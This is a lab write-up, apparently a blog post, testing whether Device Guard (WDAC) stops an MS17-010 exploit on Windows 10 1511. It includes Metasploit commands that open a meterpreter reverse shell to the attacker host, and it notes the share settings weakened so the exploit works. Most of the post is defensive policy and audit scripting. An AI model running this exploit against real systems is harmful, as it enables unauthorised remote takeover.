WDAC (Device Guard) vs RCE
Applocker failed to prevent a Remote Code Exploit (here), so let's see if Device Guard does any better...
The tests will be carried out in isolation, with all other security protections disabled; the only service protecting Windows from being pillaged is Device Guard. Microsoft seems to be going out of its way to prevent RCEs executing against Windows 10. After a few days of research and trialling, the only remote exploit that works successfully without requiring credentials is MS17-010 against Windows 10 1511. Slightly disappointing, as I was hoping to use CVE-2020-0796 against 1903 or 1909. 2020-0796 is still a PoC and, with my setup, it appears to produce lots of BSoDs.
Using Windows 10 1511 is a bit of a concern, as Device Guard was upgraded with Windows 10 1703 (Creators Update). An RCE may be able to bypass 1511 but not 1703 and onwards, and this test wouldn't reflect that.
The attacker is Kali on 192.168.0.65 running MS17_010_PSExec
The victim is Windows 10 x64 1511 on 192.168.0.15 running on Asus Zenbook 301
To exploit using MS17_010_PSExec without providing credentials, two security options on the victim were weakened:
'Restrict anonymous access to named pipes and shares' was disabled
'Shares that can be accessed anonymously' has Admin$ added
In Kali start 'msfconsole'
use exploit/windows/smb/ms17_010_psexec
set rhost 192.168.0.15
set lhost 192.168.0.65
set payload windows/meterpreter/reverse_tcp
exploit
Too easy, and I'm now the proud owner of the Zenbook.
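The two settings weakened above are what let the exploit authenticate anonymously, so they are worth auditing on any host that is supposed to be hardened. The following is an added example, not part of the original post or its script. It assumes the standard registry backing of these two Security Options (RestrictNullSessAccess and NullSessionShares under the LanmanServer Parameters key) and reports whether the host is in the default, restricted state.

```powershell
# Added example (not from the original post): report whether the two policy
# settings weakened for the test are in their hardened state on this host.
# Assumed registry backing of the Security Options:
#   'Network access: Restrict anonymous access to Named Pipes and Shares'
#       -> RestrictNullSessAccess (1 = restricted, the default)
#   'Network access: Shares that can be accessed anonymously'
#       -> NullSessionShares (multi-string list, empty by default)
$LanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-AnonymousShareExposure {
    param([string]$KeyPath = $LanmanParams)

    $props = Get-ItemProperty -Path $KeyPath -ErrorAction Stop

    # A missing value means the OS default (restricted) applies
    $restrict = if ($null -eq $props.RestrictNullSessAccess) { 1 } else { [int]$props.RestrictNullSessAccess }
    $nullShares = @($props.NullSessionShares | Where-Object { $_ -ne '' })
    $nullPipes  = @($props.NullSessionPipes  | Where-Object { $_ -ne '' })

    # Administrative shares reachable anonymously are the condition the test relied on
    $adminSharesExposed = @($nullShares | Where-Object { $_ -match '^(ADMIN|[A-Z])\$$' })

    [pscustomobject]@{
        RestrictNullSessAccess = $restrict
        NullSessionShares      = $nullShares
        NullSessionPipes       = $nullPipes
        AdminSharesAnonymous   = $adminSharesExposed
        # Hardened only when anonymous access is restricted and no share is exempted
        Hardened               = ($restrict -eq 1 -and $nullShares.Count -eq 0)
    }
}

$state = Get-AnonymousShareExposure
$state | Format-List
if (-not $state.Hardened) {
    Write-Warning "Anonymous share access is enabled; re-enable 'Restrict anonymous access' and clear the anonymous share list."
}
```

Run it in an elevated PowerShell session on the victim before and after the policy change; with the settings the post describes, it reports RestrictNullSessAccess = 0 and Admin$ in the anonymous share list, and Hardened = False.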
Device Guard has the following requirements:
Hardware Requirements
UEFI Native Mode
Windows 10/2016 x64
SLAT and Virtualization Extensions (Intel VT or AMD V)
TPM
Windows Features
Windows Defender Application Guard (Isolation mode prior to 1703)
Hyper-V Platform (Not required after 1603)
Hyper-V Hypervisor
GPO Settings
Computer Configuration > Administrative Templates > System > Device Guard
Turn on Virtualization Based Security (enable)
Secure Boot and DMA Protection
Enable Virtualization Based Protection of Code
Deploy Code Integrity Policy (enable)
C:\DeviceGuard\SIPolicy.p7b
(C:\DeviceGuard\SIPolicy.p7b is automatically copied and converted to C:\Windows\System32\Codeintegrity\)
To force the conversion run the following: Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\DeviceGuard\SIPolicy.p7b"}
The system creates SIPolicy.p7b in the CodeIntegrity folder, and a reboot enforces the Device Guard policy.
<#
.Synopsis
Builds and applies an enforced Device Guard (WDAC) code integrity policy from a scan of the current system.
.Description
Enables the Hyper-V hypervisor feature, scans the installed binaries to create an initial policy
(Publisher rules with hash fallback, including user-mode code), turns on UMCI, removes audit mode
so the policy is enforced, converts the XML to SIPolicy.p7b and asks the CI service to load it.
.Version
#>
#Enable the required Hypervisor feature
#Enable all Hyper-V features and then remove the unwanted ones. Hyper-V Hypervisor cannot be added on its own, as Hyper-V Platform is required
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Tools-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Services -NoRestart
#Sets the working folder for DG and creates it if it does not exist
$CIPolicyPath = "C:\DeviceGuard"
New-Item -ItemType Directory -Path $CIPolicyPath -Force | Out-Null
#C:\DeviceGuard\initialScan.xml - policy XML produced by the scan
$InitialCIPolicy = Join-Path $CIPolicyPath "initialScan.xml"
#C:\DeviceGuard\SIPolicy.p7b - binary policy
$CIPolicyBin = Join-Path $CIPolicyPath "SIPolicy.p7b"
#C:\DeviceGuard\CIPolicy.txt - warnings (stream 3) from the initial scan, e.g. files that could not be scanned
$CIPolicyError = Join-Path $CIPolicyPath "CIPolicy.txt"
#Scans the system and creates initialScan.xml: Publisher rules, falling back to file hashes for unsigned binaries, including user-mode PEs
New-CIPolicy -Level Publisher -Fallback Hash -FilePath $InitialCIPolicy -UserPEs 3> $CIPolicyError
#Rule option 0 = Enabled:UMCI, so user-mode code is covered by the policy
Set-RuleOption -FilePath $InitialCIPolicy -Option 0
#Rule option 3 = Enabled:Audit Mode; deleting it puts the policy into enforcement mode
Set-RuleOption -FilePath $InitialCIPolicy -Option 3 -Delete
#Converts the XML policy to the binary SIPolicy.p7b in C:\DeviceGuard
#The GPO setting copies SIPolicy.p7b to C:\Windows\System32\CodeIntegrity
ConvertFrom-CIPolicy -XmlFilePath $InitialCIPolicy -BinaryFilePath $CIPolicyBin
#Asks the Code Integrity service to load the deployed policy without a reboot
#(the file must already have been copied to C:\Windows\System32\CodeIntegrity by the GPO)
Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\Windows\System32\CodeIntegrity\SIPolicy.p7b"}
The script can be downloaded from Github (here).
Run GPUpdate and reboot
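After the reboot it is worth confirming that VBS and the policy are actually running rather than assuming it from the GPO. The following is an added example, not part of the original post or its script. It uses the Win32_DeviceGuard WMI class (assumed to be present on the build under test) and decodes the numeric status codes that Microsoft documents for it; codes outside the small tables are shown raw.

```powershell
# Added example (not from the original post): check that virtualization based
# security and the code integrity policy are running after the reboot.
# Uses the Win32_DeviceGuard class; the numeric codes are decoded per its documentation.
function Get-DeviceGuardState {
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard

    $vbsStatus = @{ 0 = 'Not enabled'; 1 = 'Enabled but not running'; 2 = 'Running' }
    $ciStatus  = @{ 0 = 'Off'; 1 = 'Audit'; 2 = 'Enforced' }
    $services  = @{ 1 = 'Credential Guard'; 2 = 'HVCI (memory integrity)' }
    $props     = @{ 1 = 'Hypervisor support'; 2 = 'Secure Boot'; 3 = 'DMA protection' }

    # Decode an array of codes with a lookup table, keeping unknown codes visible
    $decode = {
        param($map, $codes)
        @($codes) | ForEach-Object { if ($map.ContainsKey([int]$_)) { $map[[int]$_] } else { "Code $_" } }
    }

    [pscustomobject]@{
        VirtualizationBasedSecurity = $vbsStatus[[int]$dg.VirtualizationBasedSecurityStatus]
        KernelModePolicy            = $ciStatus[[int]$dg.CodeIntegrityPolicyEnforcementStatus]
        UserModePolicy              = $ciStatus[[int]$dg.UsermodeCodeIntegrityPolicyEnforcementStatus]
        ServicesConfigured          = @(& $decode $services $dg.SecurityServicesConfigured)
        ServicesRunning             = @(& $decode $services $dg.SecurityServicesRunning)
        AvailableProperties         = @(& $decode $props $dg.AvailableSecurityProperties)
        RequiredProperties          = @(& $decode $props $dg.RequiredSecurityProperties)
    }
}

$state = Get-DeviceGuardState
$state | Format-List

# The test in this post needs the user-mode policy enforced; in audit mode a blocked
# binary would only be logged, and with the policy off it would simply run
if ($state.UserModePolicy -ne 'Enforced') {
    Write-Warning "UMCI is '$($state.UserModePolicy)', not Enforced; check the SIPolicy.p7b deployment and rule options."
}
```

The same information is shown by msinfo32 under "Device Guard Security Services Running", but the function form is easier to run across a fleet or to assert on in a build check.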
To test Device Guard I attempted to run putty.exe and a few other applications; any executable that was not present during the initial scan failed to run.
The CodeIntegrity event log reported that the programs were not approved by the policy.
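Those log entries are the defender's evidence for the test, so it helps to pull them programmatically rather than scrolling Event Viewer. The following is an added example, not part of the original post or its script. It assumes the documented log channel Microsoft-Windows-CodeIntegrity/Operational and event IDs 3077 (blocked by an enforced policy) and 3076 (would have been blocked in audit mode); the regular expressions over the message text are an assumption about its wording and fall back to "(unparsed)" when they do not match.

```powershell
# Added example (not from the original post): list user-mode code integrity
# block events so the test result can be confirmed from the log.
# Event 3077 = blocked by an enforced policy, 3076 = audit-mode "would block".
function Get-CIBlockedFiles {
    param(
        [int]$Hours = 24,
        [int[]]$EventIds = @(3076, 3077)
    )

    $filter = @{
        LogName   = 'Microsoft-Windows-CodeIntegrity/Operational'
        Id        = $EventIds
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    # No events in the window is a normal outcome, not an error
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # Assumed message form: "...process (\Device\...\parent.exe) attempted to load
        # \Device\HarddiskVolumeN\path\file.exe that did not meet ... requirements"
        $file = if ($e.Message -match 'attempted to load (?<path>\\Device\\[^\s]+)') { $Matches['path'] } else { '(unparsed)' }
        $proc = if ($e.Message -match 'process \((?<proc>\\Device\\[^)]+)\)') { $Matches['proc'] } else { '(unparsed)' }

        [pscustomobject]@{
            Time    = $e.TimeCreated
            EventId = $e.Id
            Mode    = if ($e.Id -eq 3077) { 'Enforced block' } else { 'Audit only' }
            Process = $proc
            File    = $file
        }
    }
}

Get-CIBlockedFiles -Hours 24 | Sort-Object Time -Descending | Format-Table -AutoSize
```

Running this right after the putty.exe test should show a 3077 entry for it; a 3076 entry instead means the policy is still in audit mode and the launch was not actually prevented.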
And now for the Remote Code Exploit...
The good news is that Device Guard prevented the exploit on repeated attempts. That's a good day at the office: the system is safe and the attacker frustrated.